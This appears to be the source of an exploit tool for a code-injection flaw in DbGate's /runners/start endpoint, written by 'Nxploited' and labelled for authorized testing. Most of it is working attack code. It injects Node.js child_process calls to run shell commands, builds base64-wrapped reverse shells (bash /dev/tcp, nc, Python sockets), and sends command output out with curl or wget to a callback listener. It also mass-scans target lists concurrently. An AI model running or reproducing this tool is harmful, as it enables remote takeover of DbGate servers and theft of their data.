README.md
Rendering markdown...
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# By: Nxploited
#
# DbGate JSON runner assessment tool (POST /runners/start injection checks)
# Patched in DbGate v7.1.9+. For authorized security testing only.
from __future__ import annotations
import argparse
import asyncio
import base64
import json
import os
import re
import socket
import sys
import threading
import time
from dataclasses import dataclass
from http.server import BaseHTTPRequestHandler, HTTPServer
from typing import Any, Dict, List, Optional, Set, Tuple
from urllib.parse import parse_qs, quote, urljoin, urlparse, urlunparse
import aiohttp
from colorama import Fore, Style, init as color_init
color_init(autoreset=True)
OUT_DIR = "Nx"
OUT_VULN = ""
OUT_DISPATCH = ""
OUT_REVSH = ""
OUT_EXFIL = ""
OUT_FAIL = ""
OUT_LIST_REPORT = ""
OUT_SUMMARY = ""
SESSION_DIR = ""
SESSION_ID = ""
DEFAULT_TARGETS = "list.txt"
APP_NAME = "dbgate"
DEFAULT_PORT = 3000 # DbGate default HTTP port
DEFAULT_CONCURRENCY = 30
DEFAULT_TIMEOUT = 15.0
DEFAULT_CALLBACK_PORT = 8888
DEFAULT_REVSH_PORT = 4444
# ── logging ──────────────────────────────────────────────────────────────────
def log_ok(msg: str) -> None:
print(f"{Fore.GREEN}[+] {msg}{Style.RESET_ALL}")
def log_info(msg: str) -> None:
print(f"{Fore.CYAN}[*] {msg}{Style.RESET_ALL}")
def log_warn(msg: str) -> None:
print(f"{Fore.YELLOW}[!] {msg}{Style.RESET_ALL}")
def log_fail(msg: str) -> None:
print(f"{Fore.RED}[-] {msg}{Style.RESET_ALL}")
def log_pwn(msg: str) -> None:
print(f"{Fore.MAGENTA}[★] {msg}{Style.RESET_ALL}")
_SAVE_WARNED: Set[str] = set()
def save_line(path: str, line: str) -> None:
if not path:
return
try:
parent = os.path.dirname(path)
if parent:
os.makedirs(parent, exist_ok=True)
with open(path, "a", encoding="utf-8") as fh:
fh.write(line.rstrip() + "\n")
fh.flush()
except OSError as exc:
if path not in _SAVE_WARNED:
_SAVE_WARNED.add(path)
log_warn(f"Cannot write to {path}: {exc}")
def init_nx_output() -> str:
"""Create Nx/ output tree; call before any scan."""
global OUT_VULN, OUT_DISPATCH, OUT_REVSH, OUT_EXFIL, OUT_FAIL, OUT_LIST_REPORT, OUT_SUMMARY
global SESSION_DIR, SESSION_ID
os.makedirs(OUT_DIR, exist_ok=True)
os.makedirs(os.path.join(OUT_DIR, "exfil"), exist_ok=True)
SESSION_ID = time.strftime("%Y%m%d_%H%M%S")
SESSION_DIR = os.path.join(OUT_DIR, "sessions", SESSION_ID)
os.makedirs(SESSION_DIR, exist_ok=True)
OUT_VULN = os.path.join(OUT_DIR, "vuln.txt")
OUT_DISPATCH = os.path.join(OUT_DIR, "dispatch.txt")
OUT_REVSH = os.path.join(OUT_DIR, "revsh.txt")
OUT_EXFIL = os.path.join(OUT_DIR, "exfil.txt")
OUT_FAIL = os.path.join(OUT_DIR, "failed.txt")
OUT_LIST_REPORT = os.path.join(OUT_DIR, "list_report.txt")
OUT_SUMMARY = os.path.join(SESSION_DIR, "summary.json")
for p in (OUT_VULN, OUT_DISPATCH, OUT_REVSH, OUT_EXFIL, OUT_FAIL):
open(p, "a", encoding="utf-8").close()
log_ok(f"Output folder: {os.path.abspath(OUT_DIR)}/")
log_info(f"Session: {SESSION_ID}")
return SESSION_DIR
def exfil_target_key(target_url: str) -> str:
"""Canonical key for per-target exfil matching (mass-safe)."""
if not target_url or target_url == "unknown":
return "unknown"
return ensure_target_url(target_url).rstrip("/")
def nx_exfil_path(target_url: str) -> str:
tag = re.sub(r"[^\w.\-]+", "_", urlparse(target_url).netloc or "target")
return os.path.join(OUT_DIR, "exfil", f"{tag}.txt")
def save_exfil_for_target(target_url: str, peer: str, decoded: str) -> None:
line = f"[{time.strftime('%Y-%m-%d %H:%M:%S')}] peer={peer}\n{decoded}\n{'─' * 40}"
save_line(OUT_EXFIL, f"[{target_url}] {decoded[:500]}")
save_line(nx_exfil_path(target_url), line)
def url_tag(url: str) -> str:
return urlparse(url).netloc or url
# ── URL / targets ────────────────────────────────────────────────────────────
def normalize_base(url: str) -> str:
url = url.strip()
if not url:
return ""
if not re.match(r"^https?://", url, re.I):
url = "http://" + url
return url.rstrip("/")
def ensure_target_url(raw: str, default_port: int = DEFAULT_PORT) -> str:
"""
Build a valid base URL: scheme://host:port/path
Never appends port after path (fixes http://host/path:3000 bug).
"""
raw = normalize_base(raw)
if not raw:
return ""
p = urlparse(raw)
scheme = (p.scheme or "http").lower()
host = p.hostname
if not host:
return ""
if p.port is not None:
port = p.port
else:
# DbGate default when line has no explicit port (http or https)
port = default_port
path = p.path or ""
if path == "/":
path = ""
netloc = f"{host}:{port}"
return urlunparse((scheme, netloc, path, "", p.query, p.fragment))
def load_targets_raw(path: str) -> List[str]:
out: List[str] = []
try:
with open(path, "r", encoding="utf-8") as fh:
for line in fh:
out.append(line.rstrip("\n\r"))
except OSError as exc:
log_fail(f"Cannot read targets: {exc}")
return out
@dataclass
class ListLoadStats:
raw: int = 0
blank: int = 0
comment: int = 0
invalid: int = 0
dup: int = 0
resolved: int = 0
def parse_target_line(
line: str,
default_port: int = DEFAULT_PORT,
) -> Tuple[Optional[str], str, str]:
"""
Returns (url, per_target_command, reason).
Supports: host, host:port, URL, host/path, and optional |command per line.
"""
original = line
per_cmd = ""
work = line.strip()
if not work:
return None, "", "blank"
if work.startswith("#"):
return None, "", "comment"
if "|" in work:
host_part, _, cmd_part = work.partition("|")
work = host_part.strip()
per_cmd = cmd_part.strip()
line = work
if not re.match(r"^https?://", line, re.I):
if re.match(r"^[\d.a-zA-Z_-]+:\d+", line) and "/" not in line.split(":")[0]:
line = f"http://{line}"
elif re.match(r"^[\d.a-zA-Z_.-]+(:\d+)?/", line):
if not line.startswith("http"):
line = f"http://{line}"
elif re.match(r"^[\w.\-]+$", line) or re.match(r"^\d{1,3}(\.\d{1,3}){3}$", line):
line = f"http://{line}"
else:
line = f"http://{line}"
url = ensure_target_url(line, default_port)
if not url or not urlparse(url).hostname:
return None, per_cmd, f"invalid:{original[:80]}"
return url, per_cmd, ""
def load_targets_smart(
path: str,
default_port: int = DEFAULT_PORT,
) -> Tuple[List[str], Dict[str, str], ListLoadStats, List[str]]:
"""Load list file with stats; never mixes ports incorrectly."""
lines = load_targets_raw(path)
stats = ListLoadStats(raw=len(lines))
seen: Set[str] = set()
urls: List[str] = []
per_cmds: Dict[str, str] = {}
errors: List[str] = []
for line in lines:
if not line.strip():
stats.blank += 1
continue
if line.strip().startswith("#"):
stats.comment += 1
continue
url, per_cmd, reason = parse_target_line(line, default_port)
if reason == "blank":
stats.blank += 1
continue
if reason == "comment":
stats.comment += 1
continue
if not url:
stats.invalid += 1
errors.append(f"{line.strip()} -> {reason}")
continue
if url in seen:
stats.dup += 1
continue
seen.add(url)
urls.append(url)
if per_cmd:
per_cmds[url] = per_cmd
stats.resolved += 1
return urls, per_cmds, stats, errors
def write_list_report(
path: str,
stats: ListLoadStats,
urls: List[str],
errors: List[str],
default_port: int = DEFAULT_PORT,
per_cmds: Optional[Dict[str, str]] = None,
) -> None:
lines = [
f"file={path}",
f"raw={stats.raw} blank={stats.blank} comment={stats.comment}",
f"invalid={stats.invalid} dup={stats.dup} resolved={stats.resolved}",
f"default_port={default_port} (applied when line has no explicit port)",
"",
"=== resolved targets ===",
]
for u in urls:
cmd = (per_cmds or {}).get(u, "")
lines.append(f"{u}|{cmd}" if cmd else u)
if errors:
lines.extend(["", "=== invalid lines ==="])
lines.extend(errors)
try:
with open(OUT_LIST_REPORT, "w", encoding="utf-8") as fh:
fh.write("\n".join(lines) + "\n")
except OSError as exc:
log_warn(f"Cannot write list report: {exc}")
def parse_login_json(raw: Optional[str]) -> Tuple[Optional[Dict[str, Any]], Optional[str]]:
if not raw or not raw.strip():
return {"amoid": "none"}, None
try:
data = json.loads(raw)
if not isinstance(data, dict):
return None, "login JSON must be an object"
return data, None
except json.JSONDecodeError as exc:
return None, f"invalid login JSON: {exc}"
def guess_lan_ip() -> str:
try:
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.connect(("8.8.8.8", 80))
ip = s.getsockname()[0]
s.close()
return ip
except OSError:
return "127.0.0.1"
def extract_bearer_token(data: Any, raw_text: str = "") -> Optional[str]:
"""Pull Bearer token from DbGate /auth/login JSON (several response shapes)."""
if isinstance(data, dict):
for key in ("accessToken", "token", "access_token", "jwt", "bearer"):
val = data.get(key)
if val and isinstance(val, str):
return val
for nest in ("data", "result", "user", "session", "auth"):
sub = data.get(nest)
if isinstance(sub, dict):
found = extract_bearer_token(sub)
if found:
return found
if raw_text:
for pattern in (
r'"accessToken"\s*:\s*"([^"]+)"',
r'"token"\s*:\s*"([^"]+)"',
r'"access_token"\s*:\s*"([^"]+)"',
):
m = re.search(pattern, raw_text)
if m:
return m.group(1)
return None
class ReuseHTTPServer(HTTPServer):
allow_reuse_address = True
# ── injection builders ─────────────────────────────────────────────────────────
def _js_escape_single(s: str) -> str:
return (
s.replace("\\", "\\\\")
.replace("'", "\\'")
.replace("\n", "\\n")
.replace("\r", "\\r")
)
def parse_revsh_endpoint(
spec: Optional[str],
default_port: int = DEFAULT_REVSH_PORT,
) -> Tuple[str, int]:
"""
Parse LHOST:LPORT for reverse shell (address the *target* must dial).
spec None / AUTO → guessed LAN IP + default_port.
"""
if spec is None or str(spec).strip().upper() == "AUTO" or not str(spec).strip():
return guess_lan_ip(), default_port
raw = str(spec).strip()
if raw.startswith("[") and "]" in raw:
host = raw[1 : raw.index("]")]
rest = raw[raw.index("]") + 1 :]
if rest.startswith(":"):
return host, int(rest[1:])
return host, default_port
if ":" in raw:
host, _, port_s = raw.rpartition(":")
host = host.strip()
if not host:
raise ValueError(f"invalid reverse-shell endpoint: {spec!r}")
return host, int(port_s)
return raw, default_port
def build_reverse_shell_cmd(lhost: str, lport: int) -> str:
"""
Detached reverse-shell attempts (async exec). Uses base64-wrapped script
to avoid broken nested quoting inside sh -c.
"""
h, p = lhost, int(lport)
script = (
f"bash -i >& /dev/tcp/{h}/{p} 0>&1 2>/dev/null || "
f"sh -i >& /dev/tcp/{h}/{p} 0>&1 2>/dev/null || "
f"rm -f /tmp/.nx;mkfifo /tmp/.nx;cat /tmp/.nx|sh -i 2>&1|nc {h} {p} >/tmp/.nx || "
f"nc -e /bin/sh {h} {p} 2>/dev/null || "
f"busybox nc {h} {p} -e sh 2>/dev/null || "
f"python3 -c \"import socket,os,subprocess;"
f"s=socket.socket();s.connect(('{h}',{p}));"
f"os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);"
f"subprocess.call(['/bin/sh','-i'])\" 2>/dev/null"
)
payload_b64 = base64.b64encode(script.encode()).decode()
return (
f"(command -v base64 >/dev/null 2>&1 && "
f"echo {payload_b64}|base64 -d|nohup sh >/dev/null 2>&1 &) || "
f"(echo {payload_b64}|openssl base64 -d|nohup sh >/dev/null 2>&1 &)"
)
def build_node_exec_js(shell_cmd: str, sync: bool = True) -> str:
esc = _js_escape_single(shell_cmd)
if sync:
return (
f"process.mainModule.require('child_process').execSync('{esc}',"
f"{{encoding:'utf8',timeout:120000}})"
)
return f"process.mainModule.require('child_process').exec('{esc}')"
def build_shell_exfil(
cmd: str,
callback_url: str,
b64: bool = True,
target_tag: str = "",
) -> str:
base = callback_url.rstrip("/")
qs_parts: List[str] = []
if target_tag:
qs_parts.append(f"target={quote(target_tag, safe='')}")
cb_full = f"{base}?{'&'.join(qs_parts)}" if qs_parts else base
# Run command once, encode once, then try curl then wget (no double exec).
if b64:
return (
f"__nx=$( ({cmd}) 2>&1 ); "
f"b64=$(printf %s \"$__nx\" | base64 -w0 2>/dev/null "
f"|| printf %s \"$__nx\" | base64 2>/dev/null || echo FAIL); "
f"curl -sk -G '{cb_full}' --data-urlencode \"data=$b64\" "
f"|| wget -qO- --post-data=\"data=$b64\" '{cb_full}'"
)
return (
f"__nx=$( ({cmd}) 2>&1 ); "
f"curl -sk -G '{cb_full}' --data-urlencode \"data=$__nx\" "
f"|| wget -qO- --post-data=\"data=$__nx\" '{cb_full}'"
)
def inject_function_name(node_js: str) -> str:
return f"x;{node_js};//"
def inject_variable_name(node_js: str, fn_safe: str = "x") -> Tuple[str, str]:
return f"x;{node_js};var __nx", f"{fn_safe};//"
def build_json_script(
vector: str,
node_js: str,
props: Optional[Dict[str, Any]] = None,
) -> Dict[str, Any]:
props = props or {}
if vector == "functionName":
return {
"type": "json",
"commands": [{
"type": "assign",
"variableName": "x",
"functionName": inject_function_name(node_js),
"props": props,
}],
"packageNames": [],
}
if vector == "variableName":
var_name, fn_name = inject_variable_name(node_js)
return {
"type": "json",
"commands": [{
"type": "assign",
"variableName": var_name,
"functionName": fn_name,
"props": props,
}],
"packageNames": [],
}
raise ValueError(f"Unknown vector: {vector}")
# ── exfil listener ───────────────────────────────────────────────────────────
class ExfilHandler(BaseHTTPRequestHandler):
hits: List[str] = []
hits_by_target: Dict[str, List[str]] = {}
_lock = threading.Lock()
@classmethod
def hit_count(cls) -> int:
with cls._lock:
return len(cls.hits)
@classmethod
def hits_for_target(cls, target_url: str, baseline: int = 0) -> int:
key = exfil_target_key(target_url)
with cls._lock:
entries = cls.hits_by_target.get(key, [])
return max(0, len(entries) - baseline)
def log_message(self, fmt: str, *args: Any) -> None:
pass
def _parse_request(self) -> Tuple[str, str, str]:
peer = self.client_address[0]
parsed = urlparse(self.path)
qs = parse_qs(parsed.query)
target_key = qs.get("target", [""])[0]
if self.command == "POST":
length = int(self.headers.get("Content-Length", 0))
body = self.rfile.read(length).decode("utf-8", errors="replace")
bqs = parse_qs(body)
raw = bqs.get("data", [body])[0]
if not target_key:
target_key = bqs.get("target", [""])[0]
return raw, target_key, peer
raw = qs.get("data", [""])[0]
return raw, target_key, peer
def do_GET(self) -> None:
self._handle()
def do_POST(self) -> None:
self._handle()
def _handle(self) -> None:
raw, target_key, peer = self._parse_request()
decoded = raw
try:
decoded = base64.b64decode(raw).decode("utf-8", errors="replace")
except Exception:
pass
target_url = target_key or "unknown"
line = (
f"[{time.strftime('%H:%M:%S')}] peer={peer} "
f"target={target_url} | {decoded[:8000]}"
)
store_key = exfil_target_key(target_url) if target_url != "unknown" else "unknown"
with ExfilHandler._lock:
ExfilHandler.hits.append(line)
ExfilHandler.hits_by_target.setdefault(store_key, []).append(decoded)
log_pwn(f"EXFIL [{target_url}] from {peer}: {decoded[:200]!r}")
if target_url and target_url != "unknown":
save_exfil_for_target(target_url, peer, decoded)
else:
save_line(OUT_EXFIL, line)
self.send_response(200)
self.send_header("Content-Type", "text/plain")
self.end_headers()
self.wfile.write(b"ok")
def start_exfil_server(
bind_host: str,
port: int,
max_tries: int = 25,
) -> Tuple[HTTPServer, int]:
"""
Start HTTP exfil listener. If port is busy (e.g. 4444 = msf), try next ports.
"""
bind = bind_host if bind_host else "0.0.0.0"
last_err: Optional[OSError] = None
for offset in range(max_tries):
try_port = port + offset
try:
srv = ReuseHTTPServer((bind, try_port), ExfilHandler)
threading.Thread(target=srv.serve_forever, daemon=True).start()
if try_port != port:
log_warn(f"Port {port} busy — listener using {try_port} instead")
log_ok(f"Exfil listener bound on {bind}:{try_port}")
return srv, try_port
except OSError as exc:
last_err = exc
if getattr(exc, "errno", None) not in (48, 98, 10048):
raise
continue
raise OSError(
f"Could not bind {bind}:{port}-{port + max_tries - 1}: {last_err}"
)
class TcpRevshListener:
"""TCP listener to verify reverse-shell connectivity from the target."""
def __init__(self, bind_host: str = "0.0.0.0", port: int = DEFAULT_REVSH_PORT) -> None:
self.bind_host = bind_host or "0.0.0.0"
self.port = port
self._sock: Optional[socket.socket] = None
self._conn: Optional[socket.socket] = None
self.peer: Tuple[str, int] = ("", 0)
self.banner: bytes = b""
def start(self, max_tries: int = 25) -> int:
bind = self.bind_host
last_err: Optional[OSError] = None
for offset in range(max_tries):
try_port = self.port + offset
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
try:
sock.bind((bind, try_port))
sock.listen(1)
self._sock = sock
if offset > 0:
log_warn(
f"Revsh port {self.port} busy — listening on {try_port} instead"
)
self.port = try_port
log_ok(f"Reverse-shell listener on {bind}:{try_port}")
return try_port
except OSError as exc:
last_err = exc
sock.close()
if getattr(exc, "errno", None) not in (48, 98, 10048):
raise
continue
raise OSError(
f"Could not bind revsh {bind}:{self.port}-{self.port + max_tries - 1}: {last_err}"
)
def wait(self, timeout: float) -> bool:
if not self._sock:
return False
self._sock.settimeout(timeout)
try:
conn, addr = self._sock.accept()
self._conn = conn
self.peer = (addr[0], addr[1])
conn.settimeout(2.0)
try:
self.banner = conn.recv(4096)
except OSError:
self.banner = b""
return True
except socket.timeout:
return False
except OSError:
return False
def relay_interactive(self) -> None:
"""Best-effort line bridge after connect (use external nc for full TTY)."""
conn = self._conn
if not conn:
return
def _reader() -> None:
while True:
try:
data = conn.recv(4096)
if not data:
break
sys.stdout.write(data.decode("utf-8", errors="replace"))
sys.stdout.flush()
except OSError:
break
threading.Thread(target=_reader, daemon=True).start()
log_info("Interactive relay — type commands; Ctrl+C to exit")
try:
while True:
line = input()
conn.sendall((line + "\n").encode())
except (EOFError, KeyboardInterrupt, OSError):
pass
def close(self) -> None:
for s in (self._conn, self._sock):
if s:
try:
s.close()
except OSError:
pass
self._conn = None
self._sock = None
async def wait_revsh_async(listener: TcpRevshListener, timeout: float) -> bool:
loop = asyncio.get_running_loop()
return await loop.run_in_executor(None, listener.wait, timeout)
def build_callback_url(
callback_host: str,
listen_port: int,
scheme: str = "http",
) -> str:
host = callback_host.strip()
if not host:
host = guess_lan_ip()
if host in ("0.0.0.0", "::"):
log_warn("Callback host cannot be 0.0.0.0 — use an IP reachable FROM the target")
host = guess_lan_ip()
log_info(f"Using guessed LAN IP for callback: {host}")
return f"{scheme}://{host}:{listen_port}/"
# ── DbGate client ──────────────────────────────────────────────────────────────
class DbGateExploit:
VECTORS = ("functionName", "variableName", "both")
def __init__(
self,
base_url: str,
timeout: float = DEFAULT_TIMEOUT,
verify_ssl: bool = False,
token: Optional[str] = None,
login_body: Optional[Dict[str, Any]] = None,
):
self.base_url = ensure_target_url(base_url)
self.timeout = aiohttp.ClientTimeout(total=timeout)
self.verify_ssl = verify_ssl
self.token = token
self.login_body = login_body or {"amoid": "none"}
self.tag = urlparse(self.base_url).netloc or self.base_url
self.last_vector_used = ""
def _headers(self, with_auth: bool = True) -> Dict[str, str]:
h = {"Content-Type": "application/json", "Accept": "application/json"}
if with_auth and self.token:
h["Authorization"] = f"Bearer {self.token}"
return h
async def _request(
self,
session: aiohttp.ClientSession,
method: str,
path: str,
**kwargs: Any,
) -> Tuple[int, str, Any]:
url = urljoin(self.base_url + "/", path.lstrip("/"))
try:
async with session.request(
method, url, ssl=self.verify_ssl, timeout=self.timeout, **kwargs
) as resp:
text = await resp.text()
try:
data = json.loads(text) if text.strip() else {}
except json.JSONDecodeError:
data = {"_raw": text}
return resp.status, text, data
except asyncio.TimeoutError:
return 0, "timeout", {}
except aiohttp.ClientError as exc:
return 0, str(exc), {}
async def probe_alive(self, session: aiohttp.ClientSession) -> bool:
for path in ("/", "/api/status", "/status"):
status, _, _ = await self._request(session, "GET", path)
if status in (200, 401, 403, 404, 302):
return True
return False
async def obtain_token(self, session: aiohttp.ClientSession) -> bool:
if self.token:
return True
status, text, data = await self._request(
session,
"POST",
"/auth/login",
json=self.login_body,
headers={"Content-Type": "application/json"},
)
if status != 200:
log_fail(f"[{self.tag}] auth/login HTTP {status}: {text[:120]}")
return False
token = extract_bearer_token(data, text)
if not token:
log_fail(
f"[{self.tag}] no token in login response "
f"(HTTP {status}): {text[:160]}"
)
return False
self.token = token
preview = token if len(token) < 24 else f"{token[:20]}...{token[-6:]}"
log_ok(f"[{self.tag}] Bearer token auto-obtained ({preview})")
return True
async def runners_start(
self,
session: aiohttp.ClientSession,
script: Dict[str, Any],
) -> Tuple[bool, Optional[str], str]:
status, text, data = await self._request(
session,
"POST",
"/runners/start",
json={"script": script},
headers=self._headers(True),
)
if status != 200:
return False, None, f"HTTP {status}: {text[:200]}"
if isinstance(data, dict) and data.get("errorMessage"):
return False, None, str(data["errorMessage"])
runid = None
if isinstance(data, dict):
runid = data.get("runid") or data.get("runId")
if runid or "runid" in text.lower():
return True, str(runid or "?"), text
return False, None, text[:300]
async def run_injection(
self,
session: aiohttp.ClientSession,
vector: str,
node_js: str,
props: Optional[Dict[str, Any]] = None,
) -> Tuple[bool, Optional[str], str]:
if vector == "both":
ok, rid, err = await self.run_injection(
session, "functionName", node_js, props
)
if ok:
self.last_vector_used = "functionName"
return ok, rid, err
ok, rid, err = await self.run_injection(
session, "variableName", node_js, props
)
if ok:
self.last_vector_used = "variableName"
return ok, rid, err
self.last_vector_used = vector
script = build_json_script(vector, node_js, props)
return await self.runners_start(session, script)
async def check_vulnerable(
self,
session: aiohttp.ClientSession,
vector: str = "functionName",
) -> Tuple[bool, str]:
probe_js = "void 0"
ok, runid, err = await self.run_injection(session, vector, probe_js)
if ok:
v = self.last_vector_used or vector
return True, f"runner-accepted vector={v} runid={runid}"
return False, err
async def execute_command(
self,
session: aiohttp.ClientSession,
command: str,
callback_url: Optional[str] = None,
vector: str = "functionName",
async_exec: bool = False,
b64_exfil: bool = True,
) -> Tuple[bool, str]:
shell = (
build_shell_exfil(
command,
callback_url,
b64=b64_exfil,
target_tag=self.base_url,
)
if callback_url
else command
)
node_js = build_node_exec_js(shell, sync=not async_exec)
ok, runid, err = await self.run_injection(session, vector, node_js)
if ok:
v = self.last_vector_used or vector
return True, f"dispatched vector={v} runid={runid}"
return False, err
async def full_chain(
self,
command: str,
callback_url: Optional[str] = None,
vector: str = "functionName",
check_only: bool = False,
async_exec: bool = False,
b64_exfil: bool = True,
wait_exfil: float = 8.0,
target_exfil_baseline: int = 0,
use_reverse_shell: bool = False,
wait_revsh: float = 15.0,
revsh_listener: Optional[TcpRevshListener] = None,
revsh_interactive: bool = False,
) -> str:
"""
fail — unreachable / auth fail / not vulnerable
vuln — runner accepts injection probe (or exec without callback)
dispatch — payload accepted; no confirmed output / no revsh connect
exfil — callback received new data after dispatch (confirmed output)
revsh — TCP reverse connection received on local listener
"""
connector = aiohttp.TCPConnector(ssl=self.verify_ssl, limit=1)
async with aiohttp.ClientSession(connector=connector) as session:
if not await self.probe_alive(session):
log_fail(f"[{self.tag}] target not reachable")
return "fail"
if not await self.obtain_token(session):
return "fail"
vuln, detail = await self.check_vulnerable(session, vector)
if not vuln:
log_fail(f"[{self.tag}] not vulnerable / blocked: {detail}")
return "fail"
log_ok(f"[{self.tag}] VULNERABLE ({detail})")
save_line(OUT_VULN, f"{self.base_url}|{detail}")
if check_only:
return "vuln"
if not command:
return "vuln"
exec_async = async_exec or use_reverse_shell
exec_cb = None if use_reverse_shell else callback_url
ok, msg = await self.execute_command(
session,
command,
callback_url=exec_cb,
vector=vector,
async_exec=exec_async,
b64_exfil=b64_exfil,
)
if not ok:
log_fail(f"[{self.tag}] exec failed: {msg}")
return "vuln"
log_pwn(f"[{self.tag}] {msg}")
out_file = OUT_REVSH if use_reverse_shell else OUT_DISPATCH
save_line(
out_file,
f"{self.base_url}|cmd={command!r}|callback={callback_url or ''}|{msg}",
)
if use_reverse_shell:
if not revsh_listener:
log_warn(f"[{self.tag}] no revsh listener — cannot verify connection")
return "dispatch"
log_info(
f"[{self.tag}] waiting up to {wait_revsh:.0f}s for reverse TCP..."
)
if await wait_revsh_async(revsh_listener, wait_revsh):
peer = f"{revsh_listener.peer[0]}:{revsh_listener.peer[1]}"
log_ok(f"[{self.tag}] reverse TCP connected from {peer}")
if revsh_listener.banner:
preview = revsh_listener.banner[:200]
log_info(f" banner: {preview!r}")
save_line(
OUT_REVSH,
f"{self.base_url}|peer={peer}|{msg}",
)
if revsh_interactive:
revsh_listener.relay_interactive()
return "revsh"
log_warn(
f"[{self.tag}] payload dispatched but no reverse TCP "
f"(firewall/Docker/no bash|nc; target must reach listener)"
)
return "dispatch"
if not callback_url:
log_warn(f"[{self.tag}] no callback — blind dispatch only (not confirmed output)")
return "vuln"
got = await wait_for_exfil(
wait_exfil,
self.base_url,
target_exfil_baseline,
)
if got:
log_ok(f"[{self.tag}] output received via callback")
log_info(f" → {nx_exfil_path(self.base_url)}")
return "exfil"
log_warn(
f"[{self.tag}] payload dispatched but no callback data "
f"(check firewall/NAT/curl on target; callback={callback_url})"
)
return "dispatch"
# ── scan ───────────────────────────────────────────────────────────────────────
def exfil_received_for_target(target_url: str, target_baseline: int) -> bool:
"""True only if this target URL received new exfil (mass-safe, no global bleed)."""
return ExfilHandler.hits_for_target(target_url, target_baseline) > 0
async def wait_for_exfil(
wait_sec: float,
target_url: str,
target_baseline: int,
poll_sec: float = 0.5,
) -> bool:
"""Poll until callback data arrives for this target only."""
if wait_sec <= 0:
return exfil_received_for_target(target_url, target_baseline)
deadline = time.monotonic() + wait_sec
while True:
if exfil_received_for_target(target_url, target_baseline):
return True
remaining = deadline - time.monotonic()
if remaining <= 0:
return False
await asyncio.sleep(min(poll_sec, remaining))
def describe_result(result: str) -> str:
return {
"fail": "unreachable / auth failed / not vulnerable",
"vuln": "runner accepted probe (no command output)",
"dispatch": "payload accepted — no callback/revsh confirmation",
"exfil": "callback received — command output confirmed",
"revsh": "reverse TCP connection received (use --revsh-interactive for basic relay)",
}.get(result, result)
async def scan_one(
target: str,
command: str,
callback_url: Optional[str],
vector: str,
check_only: bool,
timeout: float,
verify_ssl: bool,
token: Optional[str],
login_body: Optional[Dict[str, Any]],
async_exec: bool,
b64_exfil: bool,
wait_exfil: float,
) -> str:
client = DbGateExploit(
target,
timeout=timeout,
verify_ssl=verify_ssl,
token=token,
login_body=login_body,
)
t_key = exfil_target_key(target)
with ExfilHandler._lock:
t_base = len(ExfilHandler.hits_by_target.get(t_key, []))
try:
return await client.full_chain(
command=command,
callback_url=callback_url,
vector=vector,
check_only=check_only,
async_exec=async_exec,
b64_exfil=b64_exfil,
wait_exfil=wait_exfil,
target_exfil_baseline=t_base,
)
except Exception as exc:
log_fail(f"[{client.tag}] {exc}")
return "fail"
async def mass_scan(
targets: List[str],
command: str,
callback_url: Optional[str],
vector: str,
check_only: bool,
concurrency: int,
timeout: float,
verify_ssl: bool,
token: Optional[str],
login_body: Optional[Dict[str, Any]],
async_exec: bool,
b64_exfil: bool,
wait_exfil: float,
target_commands: Optional[Dict[str, str]] = None,
) -> Dict[str, int]:
sem = asyncio.Semaphore(concurrency)
stats: Dict[str, int] = {
"exfil": 0, "dispatch": 0, "vuln": 0, "fail": 0,
}
total = len(targets)
done = 0
lock = asyncio.Lock()
async def worker(t: str) -> None:
nonlocal done
cmd = (target_commands or {}).get(t) or command
async with sem:
result = await scan_one(
t, cmd, callback_url, vector, check_only,
timeout, verify_ssl, token, login_body,
async_exec, b64_exfil, wait_exfil,
)
async with lock:
stats[result] = stats.get(result, 0) + 1
done += 1
pct = done / total * 100
print(
f"{Fore.CYAN}[{done:>5}/{total} {pct:5.1f}%] "
f"{Fore.MAGENTA}EXFIL={stats['exfil']} "
f"{Fore.GREEN}DISP={stats['dispatch']} "
f"{Fore.YELLOW}VULN={stats['vuln']} "
f"{Fore.RED}FAIL={stats['fail']}"
f"{Style.RESET_ALL}",
end="\r",
)
if result == "fail":
save_line(OUT_FAIL, t)
tasks = [asyncio.create_task(worker(t)) for t in targets]
try:
await asyncio.gather(*tasks)
except KeyboardInterrupt:
for t in tasks:
t.cancel()
print()
return stats
# ── interactive wizard ───────────────────────────────────────────────────────
def show_banner() -> None:
os.system("cls" if os.name == "nt" else "clear")
w = 84
print(Fore.MAGENTA + "═" * w + Style.RESET_ALL)
print(
Fore.WHITE + Style.BRIGHT
+ " DbGate JSON Runner — Interactive Assessment".center(w)
+ Style.RESET_ALL
)
print(Fore.MAGENTA + "─" * w + Style.RESET_ALL)
for line in (
"Mode : AUTO — one question (URL or list file), rest is automatic",
"Auto : token · listener · port 3000 · vector=both · output→Nx/",
f"Output : {OUT_DIR}/ (vuln · dispatch · exfil · failed · list_report)",
"CLI : python Nx.py --cli -u http://host:3000 (full flags)",
"Revsh : --cli -u URL --reverse-shell [LHOST:LPORT] (default LAN:4444)",
"Note : DbGate >= 7.1.9 is patched",
):
print(Fore.CYAN + f" • {line}" + Style.RESET_ALL)
print(Fore.GREEN + Style.BRIGHT + " By: Nxploited".center(w) + Style.RESET_ALL)
print(Fore.MAGENTA + "═" * w + Style.RESET_ALL)
print()
def ask(prompt: str, default: str = "") -> str:
try:
v = input(f"{Fore.CYAN} ▸ {prompt} [{default}]: {Style.RESET_ALL}").strip()
return v if v else default
except (EOFError, KeyboardInterrupt):
return default
def ask_yes(prompt: str, default: str = "n") -> bool:
v = ask(prompt, default).lower()
return v in ("y", "yes", "1", "true")
def ask_int(prompt: str, default: int, lo: int = 1, hi: int = 10000) -> int:
while True:
raw = ask(prompt, str(default))
try:
n = int(raw)
if lo <= n <= hi:
return n
except ValueError:
pass
log_warn(f"Enter a number between {lo} and {hi}")
def ask_float(prompt: str, default: float, lo: float = 0.0, hi: float = 600.0) -> float:
while True:
raw = ask(prompt, str(default))
try:
n = float(raw)
if lo <= n <= hi:
return n
except ValueError:
pass
log_warn(f"Enter a number between {lo} and {hi}")
class RunConfig:
def __init__(self) -> None:
self.mode: str = "single"
self.url: str = ""
self.targets_file: str = DEFAULT_TARGETS
self.default_port: int = DEFAULT_PORT
self.check_only: bool = False
self.command: str = "id"
self.vector: str = "functionName"
self.token: Optional[str] = None
self.login_json: str = '{"amoid":"none"}'
self.login_body: Optional[Dict[str, Any]] = None
self.threads: int = DEFAULT_CONCURRENCY
